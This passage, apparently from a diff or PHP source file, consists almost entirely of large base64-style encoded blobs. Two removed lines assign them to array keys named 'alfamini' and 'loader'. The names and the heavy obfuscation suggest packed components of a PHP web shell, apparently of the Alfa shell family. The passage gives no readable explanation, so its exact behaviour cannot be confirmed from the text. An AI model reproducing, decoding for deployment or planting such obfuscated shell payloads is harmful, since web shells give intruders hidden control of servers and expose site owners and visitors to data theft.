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';
- $s['alfamini']='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';
- $s['loader']='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